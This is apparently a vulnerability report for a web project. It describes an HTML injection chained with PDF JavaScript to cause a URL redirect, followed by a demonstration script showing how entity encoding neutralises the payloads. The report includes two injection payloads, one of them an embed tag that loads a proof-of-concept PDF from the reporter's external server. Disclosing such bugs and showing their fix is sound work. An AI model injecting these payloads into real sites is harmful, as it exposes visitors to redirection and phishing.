In the latest version there is an HTML injection which, combined with PDF JavaScript execution, leads to a URL redirect vulnerability
Passer6y opened this issue
- HTML injection
[HTML injection screenshot](https://i.loli.net/2018/11/15/5bec54988cbe0.png)
payload:
```html
<h1 style="color=red">xxx</h1>
```
Fix for the vulnerability: please HTML-entity-encode the output.
- PDF JavaScript execution combined with HTML injection
PoC: https://www.0u0.ooo/output.pdf
Because embed tags are not restricted by the same-origin policy, we could upload my PoC PDF file to our VPS and inject the following code:
payload:
```html
<embed width="100%" height="100%" name="plugin" id="plugin" src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5">
```
result: [two screenshots in the original issue]
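The following is an added example, not code from the issue or from the affected project: it shows the rendering mistake behind the report (untrusted input concatenated straight into markup) next to the fix the reporter asks for (HTML entity encoding), using the two payloads posted above. The `field` wrapper template and the `injectedTags` check are assumptions made for the demonstration; the payloads are constructed copies of the ones in the issue.

```javascript
// Added example (not the project's own code). Demonstrates why HTML entity
// encoding stops both payloads from the report. Template and helper names
// are hypothetical.

// Constructed copies of the two payloads posted in the issue.
const H1_PAYLOAD = '<h1 style="color=red">xxx</h1>';
const EMBED_PAYLOAD =
  '<embed width="100%" height="100%" name="plugin" id="plugin" ' +
  'src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5">';

// Minimal HTML entity encoder for the element-content and quoted-attribute
// contexts: every character that can open a tag, entity, or attribute
// boundary is replaced by its entity.
function escapeHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
    "`": "&#96;",
  };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Vulnerable rendering (hypothetical template): the user-controlled value is
// interpolated as raw markup, so any tag in it becomes part of the page.
function renderUnsafe(value) {
  return `<div class="field">${value}</div>`;
}

// Fixed rendering: same template, but the value is entity-encoded first, so
// the browser shows the payload as text instead of parsing it as markup.
function renderSafe(value) {
  return `<div class="field">${escapeHtml(value)}</div>`;
}

// Crude check used only for this demonstration: list every tag name in the
// output other than our own <div> wrapper. An empty list means nothing the
// user supplied was interpreted as an element.
function injectedTags(html) {
  const tags = [];
  const tagStart = /<\/?([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = tagStart.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    if (name !== "div") tags.push(name);
  }
  return tags;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const payload of [H1_PAYLOAD, EMBED_PAYLOAD]) {
    console.log("unsafe:", injectedTags(renderUnsafe(payload)));
    console.log("safe:  ", injectedTags(renderSafe(payload)));
    console.log(renderSafe(payload));
  }
}
```

Entity encoding is the right fix for the contexts shown here (element content and quoted attribute values); a value that ends up inside a URL, a `style` attribute or a script block needs that context's own encoding instead. As defence in depth, a Content-Security-Policy with `object-src 'none'` prevents the browser from loading `<embed>` and `<object>` content at all, which would stop the PDF step of the chain even if an injection slipped through.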